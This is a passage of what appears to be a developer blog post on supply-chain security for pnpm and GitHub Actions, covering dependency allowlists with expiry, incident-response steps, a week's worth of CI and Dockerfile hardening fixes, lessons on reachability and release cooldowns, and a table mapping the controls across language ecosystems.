      &lt;/span&gt;&lt;span class="nl"&gt;"tar"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"7.5.11"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every package manager has the primitive: npm &lt;code&gt;overrides&lt;/code&gt;, yarn &lt;code&gt;resolutions&lt;/code&gt;, pip &lt;code&gt;constraints.txt&lt;/code&gt;, Poetry direct-promotion, uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;, Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;, Gradle &lt;code&gt;resolutionStrategy.force&lt;/code&gt;, Cargo &lt;code&gt;[patch.crates-io]&lt;/code&gt;, Go &lt;code&gt;replace&lt;/code&gt;, Bundler direct gem pin, NuGet central package management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Override-rot is real&lt;/strong&gt; outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The &lt;code&gt;audit-allowlist.json&lt;/code&gt; schema we use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"ghsa"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"GHSA-xxxx-yyyy-zzzz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"package"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"the affected package"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"severity"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"high | critical"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rationale"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"why this risk is accepted (must explain reachability or absence of fix)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"verified_by"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"engineer email or handle"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"added"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"expires"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;max&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;90&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;days&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"follow_up"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"what removes this entry"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;CI fails when &lt;code&gt;expires&lt;/code&gt; passes; the gate forces a re-decision rather than letting drift accumulate.&lt;/p&gt;




&lt;h2&gt;
  
  
  When prevention fails: the response side
&lt;/h2&gt;

&lt;p&gt;Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Forensic record.&lt;/strong&gt; Retain CI build logs for at least 90 days, forwarded to an immutable sink (S3 with object lock, or a logging platform with retention). Without this, "did the malicious axios version run for us during the window?" is unanswerable. GitHub-hosted runners are ephemeral; once a job finishes, the host is gone. Pre-configure log shipping and an artifact upload of suspicious-run state.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Provenance lookup.&lt;/strong&gt; &lt;code&gt;rekor-cli search --artifact &amp;lt;digest&amp;gt;&lt;/code&gt; answers "did our pipeline sign this digest?" &lt;code&gt;gh attestation verify&lt;/code&gt; answers it for GitHub-attested artifacts. &lt;strong&gt;OSV-Scanner&lt;/strong&gt; retroactively queries your lockfile against advisory windows ("did we have axios 1.14.x in a build between March 30 12:00 UTC and 15:00 UTC?"). &lt;strong&gt;GUAC&lt;/strong&gt; (Graph for Understanding Artifact Composition) builds a queryable provenance graph across artifacts. &lt;strong&gt;Trivy&lt;/strong&gt; + &lt;strong&gt;Grype&lt;/strong&gt; drive SBOM-based scanning post-incident; &lt;strong&gt;Dependency-Track&lt;/strong&gt; is the consumption side. An SBOM you don't continuously diff against vulnerability feeds is a compliance artefact, not a control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OIDC token revocation playbook.&lt;/strong&gt; Know how to invalidate cached OIDC subject claims. Know which AWS role trust policies to tighten. Know how to query Sigstore Rekor for "did we sign this digest during the suspect window?" All process documentation, not tooling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secret rotation in dependency order.&lt;/strong&gt; If CI is suspect, rotation order matters. Start at the leaves (npm publish tokens, third-party SaaS keys), then deploy roles, then DB credentials. Rotating root credentials first invalidates the OIDC tokens you'd need to rotate the leaves. Document who calls whom; security incidents are a bad time to discover ambiguity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image quarantine.&lt;/strong&gt; ECR lifecycle policy plus an admission-controller tag-block on the suspected window's digests. Until your &lt;code&gt;cosign verify&lt;/code&gt; says the digest you're running is the digest you signed, treat anything from that window as suspect.&lt;/p&gt;

&lt;p&gt;Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.&lt;/p&gt;




&lt;h2&gt;
  
  
  What one week of focused work actually moved
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Third-party Action SHA pinning&lt;/td&gt;
&lt;td&gt;0% of 110 &lt;code&gt;uses:&lt;/code&gt; lines&lt;/td&gt;
&lt;td&gt;100% with &lt;code&gt;pinact&lt;/code&gt; CI gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow &lt;code&gt;permissions: write-all&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;8 of 16 workflows&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lockfile integrity coverage&lt;/td&gt;
&lt;td&gt;99.97% (1 off-registry tarball, no &lt;code&gt;integrity:&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;99.97% + CI allowlist enforcement with rationale per off-registry entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;12 hours&lt;/td&gt;
&lt;td&gt;3 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production Dockerfile USER directive&lt;/td&gt;
&lt;td&gt;0 of 7 (all root)&lt;/td&gt;
&lt;td&gt;7 of 7 (non-root)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production base image digest pinning&lt;/td&gt;
&lt;td&gt;0 of 7&lt;/td&gt;
&lt;td&gt;7 of 7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image signing&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;cosign keyless on every ECR push, workflow-path-anchored verify identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time secret scanning&lt;/td&gt;
&lt;td&gt;pre-commit only (skippable)&lt;/td&gt;
&lt;td&gt;pre-commit + CI (unskippable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time SAST&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CodeQL &lt;code&gt;security-extended&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow security audit&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependency CVE gate&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pnpm audit --prod --audit-level high&lt;/code&gt; with documented allowlist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SBOM generation&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CycloneDX + SPDX on every push to main&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 7.&lt;/strong&gt; Audit of &lt;code&gt;.github/workflows/&lt;/code&gt;. Every external &lt;code&gt;uses:&lt;/code&gt; was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. &lt;code&gt;pinact run --check --verify&lt;/code&gt; added as required status check.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 8.&lt;/strong&gt; 8 of 16 workflows ran with &lt;code&gt;permissions: write-all&lt;/code&gt;. Tightened to workflow-level &lt;code&gt;permissions: {}&lt;/code&gt; plus per-job grants. &lt;code&gt;zizmor&lt;/code&gt; added as the gate. &lt;strong&gt;First staging deploy broke&lt;/strong&gt; because &lt;code&gt;permissions: {}&lt;/code&gt; revealed an undeclared &lt;code&gt;packages: read&lt;/code&gt; that a publish job had been silently inheriting through the old &lt;code&gt;write-all&lt;/code&gt;. Caught in PR; one-line add to per-job permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 9.&lt;/strong&gt; The &lt;code&gt;opencode-review.yml:108&lt;/code&gt; CWE-78 (the lede). Four-line fix.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 10.&lt;/strong&gt; &lt;code&gt;apps/front/remote-homepage/vite.config.ts:30&lt;/code&gt; had &lt;code&gt;'process.env': process.env,&lt;/code&gt; with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 8.&lt;/strong&gt; &lt;code&gt;build-and-publish-service.yml&lt;/code&gt; lines 128 and 469: both Wiz container scan steps had &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. Doubly non-blocking. Two engineers had to reach for the keyboard to make those scans non-fatal. Removed both bypasses.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 3.&lt;/strong&gt; Lockfile audit found one off-registry tarball: &lt;code&gt;https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz&lt;/code&gt;, in two lambda &lt;code&gt;package.json&lt;/code&gt; files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 12.&lt;/strong&gt; &lt;code&gt;pnpm.overrides&lt;/code&gt; audit; the lodash story below.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 2.&lt;/strong&gt; &lt;code&gt;minimumReleaseAge&lt;/code&gt; calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a &lt;code&gt;postcss@8.5.12&lt;/code&gt; patch published four days earlier, settled at 4320 (3 days).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 5.&lt;/strong&gt; Production Dockerfile sweep. 7 of 7 images ran as root. Added &lt;code&gt;USER node&lt;/code&gt;; switched nginx-fronted images to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 5: Boundary 6.&lt;/strong&gt; Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The DX cost, honestly.&lt;/strong&gt; PR-time latency went from p50 4m / p95 9m to p50 6m / p95 14m. CodeQL &lt;code&gt;security-extended&lt;/code&gt; is the long pole at ~7m. False-positive rate after the first week of tuning: zizmor ~5%, gitleaks ~2% with the project-tuned config. Two engineers asked for a &lt;code&gt;--no-verify&lt;/code&gt; escape hatch on &lt;code&gt;pinact&lt;/code&gt; early on; we declined. One pushed back hard enough that I owed him a 1:1 walking through the tj-actions chain. The friction is real and you should plan for the conversation. Fast-path bypass: a &lt;code&gt;security-bypass&lt;/code&gt; label requires CODEOWNERS approval, expires on merge, audit-logged.&lt;/p&gt;




&lt;h2&gt;
  
  
  Five lessons that don't fit in a framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. The "patched version" you find in an advisory is not always the version you can ship.
&lt;/h3&gt;

&lt;p&gt;Day 4 the advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via &lt;code&gt;_.template&lt;/code&gt;) said "fixed in 4.18.0." Our &lt;code&gt;pnpm.overrides&lt;/code&gt; had &lt;code&gt;lodash-es: 4.18.0&lt;/code&gt; and &lt;code&gt;lodash: 4.18.1&lt;/code&gt; both flagged green by the advisory.&lt;/p&gt;

&lt;p&gt;Then I checked the npm registry page. 4.18.0 was marked as a deprecated "Bad release." We were pinned to a withdrawn version, which is its own kind of supply-chain debt. The current stable was 4.17.23. The patch wasn't in it.&lt;/p&gt;

&lt;p&gt;I kept the terminal open and ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rE&lt;/span&gt; &lt;span class="s1"&gt;'_\.template\('&lt;/span&gt; apps/ libs/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing. Across multiple projects, no production source called &lt;code&gt;_.template&lt;/code&gt;. The vulnerable code path was unreachable.&lt;/p&gt;

&lt;p&gt;That grep is a hand-rolled approximation of &lt;strong&gt;reachability analysis&lt;/strong&gt;  the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with &lt;code&gt;taint-tracking&lt;/code&gt; queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.&lt;/p&gt;

&lt;p&gt;The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.&lt;/p&gt;

&lt;p&gt;Three months from now the entry expires. CI fails again. Someone re-runs the grep and decides: still unreachable, renew? Or has someone added &lt;code&gt;_.template&lt;/code&gt; to a new feature, in which case the override is no longer safe. Either way, the decision happens. That's the difference between an allowlist with an expiry and an &lt;code&gt;eslint-disable-next-line&lt;/code&gt; that lives forever.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Aggressive controls block legitimate fixes. Calibrate, don't posture.
&lt;/h3&gt;

&lt;p&gt;Started at &lt;code&gt;minimumReleaseAge: 10080&lt;/code&gt; (7 days, pnpm's recommended baseline). Within the hour it blocked &lt;code&gt;postcss@8.5.12&lt;/code&gt;, a CVE patch published four days earlier. Dropped to 3 days.&lt;/p&gt;

&lt;p&gt;The "right" number depends on your workload. A healthcare-staffing platform tolerates 72 hours of CVE-patch latency more easily than fintech tolerates 12. Write down why you picked the number. Three days catches the noisy fast attacks (axios, ua-parser-js, @solana/web3.js were all yanked in &amp;lt;5 hours). It does not catch the patient ones (xz-utils ran 2 years; Shai-Hulud's worm re-publishes from already-trusted maintainer accounts can outlast any cooldown). &lt;code&gt;minimumReleaseAge&lt;/code&gt; is a layer, not the wall.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Detection without enforcement is not security.
&lt;/h3&gt;

&lt;p&gt;The week started with the Slack message above. The most striking finding: every right primitive was already there Wiz, SonarCloud, Renovate, gitleaks, custom rules. None of them were blocking merges. Wiz container scans were running with &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with &lt;code&gt;--no-verify&lt;/code&gt;. Renovate filed PRs nobody was required to merge.&lt;/p&gt;

&lt;p&gt;Moving those gates into PR-time required-status-checks (same tools, same configurations, just &lt;code&gt;required: true&lt;/code&gt; in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement we don't have a counterfactual. Take it as senior intuition.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. The blast radius of a CI compromise is usually larger than any application bug.
&lt;/h3&gt;

&lt;p&gt;An app bug leaks data. A CI compromise leaks everything that has ever run through CI: AWS credentials, deploy keys, npm tokens, signing keys, source code, SBOMs, any customer-data backup that happened to touch a build step. Treat CI/CD like production, because it has the same blast radius.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. These controls assume a clean threat model. Both halves of that assumption fail.
&lt;/h3&gt;

&lt;p&gt;Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider with valid signed commits every Phase 1 control passes. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.&lt;/p&gt;




&lt;h2&gt;
  
  
  Process and culture
&lt;/h2&gt;

&lt;p&gt;Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CODEOWNERS on every supply-chain surface.&lt;/strong&gt; Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and &lt;code&gt;audit-allowlist.json&lt;/code&gt; itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Allowlists with expiry, never silent ignores.&lt;/strong&gt; Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny as engineering culture.&lt;/strong&gt; &lt;code&gt;permissions: {}&lt;/code&gt; at workflow level. Empty Dockerfile &lt;code&gt;USER&lt;/code&gt; rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When &lt;code&gt;zizmor&lt;/code&gt; flags a workflow, gitleaks catches a token, or an audit advisory blocks a merge, the response is "what process let this through?" not "who put it there?" The first question gets you better controls. The second one gets you quieter engineers.&lt;/p&gt;




&lt;h2&gt;
  
  
  What you can ship alone vs. what needs platform
&lt;/h2&gt;

&lt;p&gt;Half the controls above can be adopted by a single team owning a single repo. The other half need platform / security-org buy-in. The trap is adopting the team-side half without the platform-side half you eat the friction without the protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A team can ship alone:&lt;/strong&gt; SHA-pinning their own workflows. Lockfile pins. &lt;code&gt;minimumReleaseAge&lt;/code&gt; in their own pnpm/Renovate config. Logger redaction in their own service. Default-deny &lt;code&gt;permissions:&lt;/code&gt; in their own workflows. Dockerfile non-root.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs platform / security org:&lt;/strong&gt; CODEOWNERS gating across the org. OIDC trust-policy authoring. Branch protection on &lt;code&gt;main&lt;/code&gt;. Admission controllers verifying cosign signatures at deploy time. Log retention infrastructure. Secret rotation runbooks. Cross-repo CI runner isolation.&lt;/p&gt;

&lt;p&gt;If you're a single team and the platform-side controls don't exist yet, the highest-leverage moves are the three that would have stopped both attacks in this article cold: SHA-pin every external &lt;code&gt;uses:&lt;/code&gt;, scope every &lt;code&gt;permissions:&lt;/code&gt; block to least privilege, set &lt;code&gt;minimumReleaseAge&lt;/code&gt; to 3+ days. The first two are local edits. The third is one config line. Together they're roughly two days of work.&lt;/p&gt;




&lt;h2&gt;
  
  
  Translation table: the boundaries in your stack
&lt;/h2&gt;

&lt;p&gt;This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Boundary&lt;/th&gt;
&lt;th&gt;pnpm/JS&lt;/th&gt;
&lt;th&gt;Python&lt;/th&gt;
&lt;th&gt;Java/Maven&lt;/th&gt;
&lt;th&gt;Go&lt;/th&gt;
&lt;th&gt;Rust&lt;/th&gt;
&lt;th&gt;Ruby&lt;/th&gt;
&lt;th&gt;.NET&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Pin to immutable identifier&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;package.json&lt;/code&gt; exact + &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip-compile --generate-hashes&lt;/code&gt; + &lt;code&gt;--require-hashes&lt;/code&gt;; or &lt;code&gt;poetry install --no-update&lt;/code&gt;; or &lt;code&gt;uv sync --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;mvn-dependency-lock-plugin&lt;/code&gt; + &lt;code&gt;dependencies.lock&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;GOFLAGS=-mod=readonly&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Cargo.lock&lt;/code&gt; + &lt;code&gt;cargo --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Gemfile.lock&lt;/code&gt; + &lt;code&gt;bundle config set frozen true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;packages.lock.json&lt;/code&gt; + &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Cooldown on fresh publishes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm-native)&lt;/td&gt;
&lt;td&gt;Renovate &lt;code&gt;minimumReleaseAge&lt;/code&gt; (covers PyPI); commercial: Socket, Phylum&lt;/td&gt;
&lt;td&gt;Renovate (covers Maven Central)&lt;/td&gt;
&lt;td&gt;Renovate (covers Go modules) + &lt;code&gt;govulncheck&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;cargo-deny [advisories] yanked = "deny"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;bundler-audit&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;3. Lockfile integrity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;integrity: sha512:...&lt;/code&gt; per entry&lt;/td&gt;
&lt;td&gt;hash via &lt;code&gt;--require-hashes&lt;/code&gt;; Poetry &lt;code&gt;content-hash&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Gradle &lt;code&gt;verification-metadata.xml&lt;/code&gt;; Maven &lt;code&gt;--strict-checksums&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;sum.golang.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Cargo lockfile checksums (built-in)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bundle config set verify_files true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet trust&lt;/code&gt; for signed packages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;4. Lifecycle script gate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;onlyBuiltDependencies&lt;/code&gt; + &lt;code&gt;--ignore-scripts&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install --only-binary=:all:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; + checksum-pin them&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgo&lt;/code&gt; / &lt;code&gt;//go:generate&lt;/code&gt; controlled via Bazel/Nix sandbox&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;build.rs&lt;/code&gt; sandboxed via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;bundle config force_ruby_platform true&lt;/code&gt; to skip native; or sandbox&lt;/td&gt;
&lt;td&gt;PackageReference (modern) doesn't run scripts; audit any &lt;code&gt;packages.config&lt;/code&gt; projects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5. Base image digest pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;FROM image:tag@sha256:...&lt;/code&gt; (any Dockerfile, any language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;6. Image signing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cosign + Sigstore (any registry, any image)&lt;/td&gt;
&lt;td&gt;same; PEP 740 attestations + &lt;code&gt;sigstore&lt;/code&gt; for wheels&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for JARs&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;slsa-github-generator/builder-go&lt;/code&gt; for SLSA&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cargo-dist&lt;/code&gt; + Sigstore&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet nuget sign&lt;/code&gt;; NuGet signature verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;7. CI mutable-ref pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt;; &lt;code&gt;pinact&lt;/code&gt; enforce&lt;/td&gt;
&lt;td&gt;(Python doesn't have an "Actions" concept; this is CI-platform, not language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8. Default-deny permissions&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GHA &lt;code&gt;permissions: {}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;(CI-platform; see CI table below)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
